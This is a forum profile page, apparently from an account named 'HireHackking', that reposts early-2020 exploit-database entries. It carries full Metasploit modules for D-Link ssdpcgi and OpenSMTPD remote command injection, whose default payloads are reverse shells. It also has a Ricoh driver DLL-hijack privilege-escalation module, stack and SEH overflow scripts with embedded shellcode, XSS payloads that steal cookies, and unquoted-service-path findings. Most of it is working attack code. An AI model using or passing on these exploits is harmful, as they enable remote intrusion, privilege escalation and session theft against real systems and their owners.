Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Dota 2 7.23f - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dota 2 7.23f - Denial of Service (PoC) # Google Dork: N/A # Date: 2020-02-05 # Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) (bi7s) # Vendor Homepage: https://www.valvesoftware.com/en/ # Software Link: N/A # Version: 7.23f # Tested on: Windows 10 (x64) # CVE : CVE-2020-7949 Valve Dota 2 (schemasystem.dll) before 7.23f allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is mishandled during a GetValue call. Attacker need invite a victim to play on attacker game server using specially crafted map or create custom game, then when initialize the game of the victim, the specially crafted map will be automatically downloaded and processed by the victim, which will lead to the possibility to exploit vulnerability. Also attacker can create custom map and upload it to Steam <https://steamcommunity.com/sharedfiles/filedetails/?id=328258382>. Steps for reproduce: 1. Copy attached file zuff.vpk ( https://github.com/bi7s/CVE/blob/master/CVE-2020-7949/zuff.zip) to map directory (C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\dota\maps) 2. Launch Dota2 3. Launch "zuff" map from Dota2 game console. Command for game console = map zuff 4. Dota2 is crash (Access Violation) Debug information: (2098.1634): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win64\schemasystem.dll - (2098.1634): Access violation - code c0000005 (!!! second chance !!!) rax=00000000ffffffff rbx=0000027ba23dd9b6 rcx=0000027ba23dd9b6 rdx=0000000042424242 rsi=0000027b5ffb9774 rdi=0000000000000000 rip=00007ffa73af90ce rsp=000000e82bcfe900 rbp=0000000000000000 r8=00000000412ee51c r9=000000e82bcfea88 r10=0000027b5ffb9774 r11=00000000412ee51c r12=0000027b5ffbe582 r13=000000e82bcfe9f0 r14=0000027b5ffb5328 r15=0000000000000010 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200 schemasystem!BinaryProperties_GetValue+0x10ae: 00007ffa`73af90ce 40383b cmp byte ptr [rbx],dil ds:0000027b`a23dd9b6=??
  2. HireHackking

    WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting # Date: 2020-01-14 # Vendor Homepage: https://www.learndash.com # Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312 # Exploit Author: Jinson Varghese Behanan # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/ # Author Homepage: https://www.jinsonvarghese.com # Version: 3.0.0 - 3.1.1 # CVE : CVE-2020-7108 1. Description LearnDash is one of the most popular and easiest to use WordPress LMS plugins in the market. It allows users to easily create courses and sell them online and boasts a large customer base. The plugin allows users to search for courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross site scripting. All WordPress websites using LearnDash version 3.0.0 through 3.1.1 are affected. 2. Proof of Concept Once the user is logged in to the WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be inserted into the Search Your Courses box. The payload gets executed because the user input is not properly validated. As a result, passing the XSS payload as a query string in the URL will also execute the payload. [wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions. GET /wp-admin/admin-ajax.php?action=ld30_ajax_profile_search&shortcode_instance%5Buser_id%5D=1&shortcode_instance%5Bper_page%5D=20&shortcode_instance%5Border%5D=DESC&shortcode_instance%5Borderby%5D=ID&shortcode_instance%5Bcourse_points_user%5D=yes&shortcode_instance%5Bexpand_all%5D=false&shortcode_instance%5Bprofile_link%5D=true&shortcode_instance%5Bshow_header%5D=yes&shortcode_instance%5Bshow_quizzes%5D=true&shortcode_instance%5Bshow_search%5D=yes&shortcode_instance%5Bquiz_num%5D=20&shortcode_instance%5Bpaged%5D=1&shortcode_instance%5Bs%5D=&ld-profile-search=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1 Host: learndashtesting.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://learndashtesting.com/my-account-2/ Cookie: wordpress_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7C7ec9ebfd67acdbc669395821f620198e67cb74780c9a8db63923b528aa661acd; PHPSESSID=e7c30849dbdab6f1cafcccef0ad7e7a0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7Cfcf64acbc9b6ba7aaafb9c3b077581347d65ca8e010135cc232dcfc0335ec6d8; wordpress_cf_adm_use_adm=1; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg; wp-settings-time-1=1581331685 3. Timeline Vulnerability reported to the LearnDash team – January 14, 2020 LearnDash version 3.1.2 containing the fix released – January 14, 2020
  3. HireHackking

    iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()

    HireHackking posted a blog entry in Hacker Technology
    While investigating possible shared memory issues in AGXCommandQueue::processSegmentKernelCommand(), I noticed that the size checks used to parse the IOAccelKernelCommand in IOAccelCommandQueue2::processSegmentKernelCommand() are incorrect. The IOAccelKernelCommand contains an 8-byte header consisting of a command type and size, followed by structured data specific to the type of command. When verifying that the size of the IOAccelKernelCommand has enough data for the specific command type, it appears that the check excludes the size of the 8-byte header, meaning that processSegmentKernelCommand() will parse up to 8 bytes of out-of-bounds data. Normally I wouldn't consider this very security-relevant. However, command type 2 corresponds to kIOAccelKernelCommandCollectTimeStamp, which actually *writes* into the OOB memory rather than just parsing data from it. (The IOAccelKernelCommand is being parsed from shared memory, so the write is visible to userspace.) This makes it possible to overwrite the first 1-8 bytes of the subsequent page of memory with timestamp data. The attached POC should trigger the issue on iOS 13. Tested on iPod9,1 17B111. I haven't tested on macOS, but it looks like the issue is present there as well. I'll also tack on to this issue that on the whole AGXCommandQueue seems to do a poor job of treating shared memory as volatile, and I suspect that there are further issues here that are worth looking into. For example, when IOAccelKernelCommand's type is 0x10000, AGXCommandQueue::processSegmentKernelCommand() does not use the fourth parameter (which points to the end of the IOAccelKernelCommand as parsed by IOAccelCommandQueue2::processSegmentKernelCommands()) except when passing it to IOAccelCommandQueue2::processSegmentKernelCommand(), instead double-fetching the command size from shared memory to verify that all the command data is in-bounds. Thus, I believe it's possible to make AGXCommandQueue::processSegmentKernelCommand() parse out-of-bounds data, although I have not found a way to turn this into an interesting exploitation primitive. I don't think the shared memory issues are isolated to this function either. For example, there used to be much more readily exploitable double-fetches in AGXAllocationList2::initWithSharedResourceList(), although these were fixed sometime between 16A5288q and 16G77. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48035.zip
  4. HireHackking

    D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Udp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi', 'Description' => %q{ D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi. }, 'Author' => [ 's1kr10s', 'secenv' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-20215'], ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73'] ], 'DisclosureDate' => 'Dec 24 2019', 'Privileged' => true, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp', 'CMDSTAGER::FLAVOR' => 'wget', 'RPORT' => '1900' }, 'Targets' => [ [ 'Auto', { } ], ], 'CmdStagerFlavor' => %w{ echo wget }, 'DefaultTarget' => 0 )) register_options( [ Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']]) ]) end def exploit execute_cmdstager(linemax: 1500) end def execute_command(cmd, opts) type = datastore['VECTOR'] if type == "URN" print_status("Target Payload URN") val = "urn:device:1;`#{cmd}`" else print_status("Target Payload UUID") val = "uuid:`#{cmd}`" end connect_udp header = "M-SEARCH * HTTP/1.1\r\n" header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n" header << "ST:#{val}\r\n" header << "Man:\"ssdp:discover\"\r\n" header << "MX:2\r\n\r\n" udp_sock.put(header) disconnect_udp end end
  5. HireHackking

    Ricoh Driver - Privilege Escalation (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Post::Windows::Priv include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Ricoh Driver Privilege Escalation', 'Description' => %q( Various Ricoh printer drivers allow escalation of privileges on Windows systems. For vulnerable drivers, a low-privileged user can read/write files within the `RICOH_DRV` directory and its subdirectories. `PrintIsolationHost.exe`, a Windows process running as NT AUTHORITY\SYSTEM, loads driver-specific DLLs during the installation of a printer. A user can elevate to SYSTEM by writing a malicious DLL to the vulnerable driver directory and adding a new printer with a vulnerable driver. This module leverages the `prnmngr.vbs` script to add and delete printers. Multiple runs of this module may be required given successful exploitation is time-sensitive. ), 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Pudwill', # discovery & PoC 'Pentagrid AG', # PoC 'Shelby Pace' # msf module ], 'References' => [ [ 'CVE', '2019-19363'], [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/'] ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => 'win', 'Payload' => { }, 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [[ 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]], 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK ], 'Reliability' => [ UNRELIABLE_SESSION ], 'Stability' => [ SERVICE_RESOURCE_LOSS ] }, 'DisclosureDate' => "Jan 22 2020", 'DefaultTarget' => 0 )) self.needs_cleanup = true register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ]) end def check dir_name = "C:\\ProgramData\\RICOH_DRV" return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name) driver_names = dir(dir_name) return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length vulnerable = false driver_names.each do |driver_name| full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz" next unless directory?(full_path) @driver_path = full_path res = cmd_exec("icacls \"#{@driver_path}\"") next unless res.include?('Everyone:') next unless res.match(/\(F\)/) vulnerable = true break end return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable vprint_status("Vulnerable driver directory: #{@driver_path}") CheckCode::Appears('Ricoh driver directory has full permissions') end def add_printer(driver_name) fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) dll_data = generate_payload_dll dll_path = "#{@driver_path}\\headerfooter.dll" temp_path = expand_path('%TEMP%\\headerfooter.dll') vprint_status("Writing dll to #{temp_path}") bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat") cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\"" bat_file = <<~HEREDOC :repeat #{cp_cmd} && goto :repeat HEREDOC write_file(bat_file_path, bat_file) write_file(temp_path, dll_data) register_files_for_cleanup(bat_file_path, temp_path) script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\"" bat_cmd = "cmd.exe /c \"#{bat_file_path}\"" print_status("Adding printer #{@printer_name}...") client.sys.process.execute(script_cmd, nil, { 'Hidden' => true }) vprint_status("Executing script...") cmd_exec(bat_cmd) rescue Rex::Post::Meterpreter::RequestError => e e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") end def exploit fail_with(Failure::None, 'Already running as SYSTEM') if is_system? fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' if sysinfo['Architecture'] != payload.arch.first fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver') end @driver_path = '' unless check == CheckCode::Appears || datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override') end @printer_name = Rex::Text.rand_text_alpha(5..9) @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs" drvr_name = @driver_path.split('\\') drvr_name_idx = drvr_name.index('RICOH_DRV') + 1 drvr_name = drvr_name[drvr_name_idx] add_printer(drvr_name) end def cleanup print_status("Deleting printer #{@printer_name}") Rex.sleep(3) delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\"" client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true }) end end
  6. HireHackking

    Torrent iPod Video Converter 1.51 - Stack Overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow # Exploit Author: boku # Date: 2020-02-10 # Software Vendor: torrentrockyou # Vendor Homepage: http://www.torrentrockyou.com # Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe # Version: Torrent iPod Video Converter Version 1.51 Build 115 # Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363 # Recreate: # 1) Download, install, and open Torrent iPod Video Converter # 2) run python script & open created 'poc.txt' file # 3) select-all > copy-all # 4) in app, click 'Register' on the bottom # 5) in 'Name:' textbox enter 'a' # 6) in 'Code:' textbox paste buffer # 7) click 'OK', calculator will open & app will crash # ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python # x86/alpha_upper chosen with final size 447 # the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub. #shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" # echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm - # 89E7 mov di,sp # DADC fcmovu st4 # D977F4 fnstenv [bx-0xc] # 5D pop bp # 55 push bp # 59 pop cx # 49 dec cx shellcode = b'\x54\x5f' # push esp # pop edi shellcode += b'\x56\x59' # push esi # pop ecx shellcode += b'\x41\x90' # inc ecx # nop # Fix the offset for GetPC shellcode += b'\x90\x90\x90\x90\x90' # keep the byte length the same shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50" shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39" shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b" shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c" shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a" shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43" shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51" shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c" shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50" shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44" shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51" shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59" shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a" shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58" shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54" shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b" shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c" shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56" shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45" shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b" shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31" shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a" shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51" shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d" shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45" shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51" shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f" shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38" shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59" shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50" shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37" shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50" shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52" shellcode += b"\x4c\x52\x43\x33\x30\x41\x41" EIP_OS = '\x41'*(4136-len(shellcode)) EIP = '\x5a\x32\x4f' # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe) payload = shellcode + EIP_OS + EIP try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  7. HireHackking

    OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Expect def initialize(info = {}) super(update_info(info, 'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution', 'Description' => %q{ This module exploits a command injection in the MAIL FROM field during SMTP interaction with OpenSMTPD to execute code as the root user. }, 'Author' => [ 'Qualys', # Discovery and PoC 'wvu', # Module 'RageLtMan <rageltman[at]sempervictus>' # Module ], 'References' => [ ['CVE', '2020-7247'], ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3'] ], 'DisclosureDate' => '2020-01-28', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Targets' => [ ['OpenSMTPD >= commit a8e222352f', 'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars ] ], 'DefaultTarget' => 0, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'} )) register_options([ Opt::RPORT(25), OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root']) ]) register_advanced_options([ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5]) ]) end def check connect res = sock.get_once return CheckCode::Unknown unless res return CheckCode::Detected if res =~ /^220.*OpenSMTPD/ CheckCode::Safe rescue EOFError, Rex::ConnectionError => e vprint_error(e.message) CheckCode::Unknown ensure disconnect end def exploit unless datastore['ForceExploit'] unless check == CheckCode::Detected fail_with(Failure::Unknown, 'Set ForceExploit to override') end end # We don't care who we are, so randomize it me = rand_text_alphanumeric(8..42) # Send mail to this valid recipient to = datastore['RCPT_TO'] # Comment "slide" courtesy of Qualys - brilliant! iter = rand_text_alphanumeric(15).chars.join(' ') from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;" # This is just insurance, since the code was already written if from.length > 64 fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars') elsif (badchars = (from.chars & target['MyBadChars'])).any? fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}") end # Create the mail body with comment slide and payload body = "\r\n" + "#\r\n" * 15 + payload.encoded sploit = { nil => /220.*OpenSMTPD/, "HELO #{me}" => /250.*pleased to meet you/, "MAIL FROM:<#{from}>" => /250.*Ok/, "RCPT TO:<#{to}>" => /250.*Recipient ok/, 'DATA' => /354 Enter mail.*itself/, body => nil, '.' => /250.*Message accepted for delivery/, 'QUIT' => /221.*Bye/ } print_status('Connecting to OpenSMTPD') connect print_status('Saying hello and sending exploit') sploit.each do |line, pattern| send_expect( line, pattern, sock: sock, timeout: datastore['ExpectTimeout'], newline: "\r\n" ) end rescue Rex::ConnectionError => e fail_with(Failure::Unreachable, e.message) rescue Timeout::Error => e fail_with(Failure::TimeoutExpired, e.message) ensure disconnect end end
  8. HireHackking

    CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting # Google Dork: In Shodan search engine, the filter is "CHIYU" # Date: 2020-02-11 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.chiyu-t.com.tw/en/ # Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00 # Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html # CVE: CVE-2020-8839 # 1. Description: # In CHIYU BF430 web page, # user can modify the system configuration by access the /if.cgi. # Attackers can inject malicious XSS code in "TF_submask" field. # The XSS code will be stored in the database, so that causes a stored XSS vulnerability. # 2. Proof of Concept: # Access the /if.cgi of CHIYU BF430 232/485 TCP/IP Converter. # Injecting the XSS code in parameter “TF_submask”: # http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E ==--------------------------------------------------------------- This email contains information that is for the sole use of the intended recipient and may be confidential or privileged. If you are not the intended recipient, note that any disclosure, copying, distribution, or use of this email, or the contents of this email is prohibited. If you have received this email in error, please notify the sender of the error and delete the message. Thank you. ---------------------------------------------------------------==!!
  9. HireHackking

    freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.freesshd.com Software Link: http://www.freesshd.com/freeFTPd.exe Version: 1.0.13 Tested On: Windows 10 (32-bit) C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """ freeFTPdService C:\Program Files\freeSSHd\freeFTPdService.exe Auto C:\Users\nightelf>sc qc freeFTPdService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: freeFTPdService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\freeSSHd\freeFTPdService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : freeFTPdService DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem
  10. HireHackking

    Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-02-10 # Exploit Author: Sayak Naskar # Vendor Homepage: https://vanillaforums.com/en/ # Version: 2.6.3 # Tested on: Windows, Linux # CVE : CVE-2020-8825 A Stored xss was found in Vanillaforum 2.6.3 . index.php?p=/dashboard/settings/branding # Proof of Concept: An attacker will insert a payload on branding section. So, whenever an user will open the branding section then attacker automatically get all sensitive information of the user.
  11. HireHackking

    DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-10 #Vendor Homepage : http://www.picture-on-tv.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "key.txt". #2. Just copy the text inside "key.txt". #3. Start the program. In the new window click "Help" > "Register ... #4. Now paste the content of "key.txt" into the field: "Registration Key" > Click "Ok" #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 1608 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x10014283) #0x10014283 : pop ebx # pop ecx # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("key.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  12. HireHackking

    FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.freesshd.com Software Link: http://www.freesshd.com/freeSSHd.exe Version: 1.3.1 Tested On: Windows 10 (32-bit) C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freesshd" | findstr /i /v """ FreeSSHDService C:\Program Files\freeSSHd\FreeSSHDService.exe Auto C:\Users\nightelf>sc qc FreeSSHDService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FreeSSHDService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\freeSSHd\FreeSSHDService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FreeSSHDService DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem
  13. HireHackking

    Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
